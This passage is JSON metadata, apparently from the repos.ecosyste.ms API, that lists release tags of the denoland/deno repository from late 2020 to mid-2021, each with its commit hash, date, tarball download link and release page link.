https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/de